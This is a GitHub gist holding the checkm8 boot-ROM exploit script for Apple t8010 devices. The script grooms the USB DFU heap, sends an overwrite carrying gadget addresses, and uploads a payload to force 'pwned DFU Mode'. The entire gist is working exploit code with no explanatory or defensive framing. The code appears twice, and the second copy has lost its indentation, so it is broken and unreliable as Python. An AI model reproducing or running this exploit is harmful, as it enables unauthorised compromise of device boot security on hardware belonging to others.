bbaranoff/gist:0d9e905d430128076ca96fb7f303d05c

## gistfile1.txt
#!/usr/bin/env python

from checkm8 import *

def main():
    print '*** checkm8 exploit by axi0mX ***'

    device = dfu.acquire_device(1800)
    start = time.time()
    print 'Found:', device.serial_number
    if 'PWND:[' in device.serial_number:
        print 'Device is already in pwned DFU Mode. Not executing exploit.'
        return

    payload, _ = exploit_config(device.serial_number)
    t8010_nop_gadget = 0x10000CC6C
    callback_chain = 0x1800B0800
    t8010_overwrite = '\0' * 0x5c0
    t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)

    # heap feng-shui
    stall(device)
    leak(device)
    for i in range(6):
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)

    # set global state and restart usb
    device = dfu.acquire_device()
    device.serial_number
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)

    time.sleep(0.5)

    # heap occupation
    device = dfu.acquire_device()
    device.serial_number
    stall(device)
    leak(device)
    leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)
    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
                                       payload[i:i+0x800], 50)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    if 'PWND:[checkm8]' not in device.serial_number:
        print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
        sys.exit(1)
    print 'Device is now in pwned DFU Mode.'
    print '(%0.2f seconds)' % (time.time() - start)
    dfu.release_device(device)

if __name__ == '__main__':
    main()
	#!/usr/bin/env python

	from checkm8 import *

	def main():
	print '* checkm8 exploit by axi0mX *'

	device = dfu.acquire_device(1800)
	start = time.time()
	print 'Found:', device.serial_number
	if 'PWND:[' in device.serial_number:
	print 'Device is already in pwned DFU Mode. Not executing exploit.'
	return

	payload, _ = exploit_config(device.serial_number)
	t8010_nop_gadget = 0x10000CC6C
	callback_chain = 0x1800B0800
	t8010_overwrite = '\0' * 0x5c0
	t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)

	# heap feng-shui
	stall(device)
	leak(device)
	for i in range(6):
	no_leak(device)
	dfu.usb_reset(device)
	dfu.release_device(device)

	# set global state and restart usb
	device = dfu.acquire_device()
	device.serial_number
	libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
	libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
	dfu.release_device(device)

	time.sleep(0.5)

	# heap occupation
	device = dfu.acquire_device()
	device.serial_number
	stall(device)
	leak(device)
	leak(device)
	libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)
	for i in range(0, len(payload), 0x800):
	libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
	payload[i:i+0x800], 50)
	dfu.usb_reset(device)
	dfu.release_device(device)

	device = dfu.acquire_device()
	if 'PWND:[checkm8]' not in device.serial_number:
	print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
	sys.exit(1)
	print 'Device is now in pwned DFU Mode.'
	print '(%0.2f seconds)' % (time.time() - start)
	dfu.release_device(device)

	if __name__ == '__main__':
	main()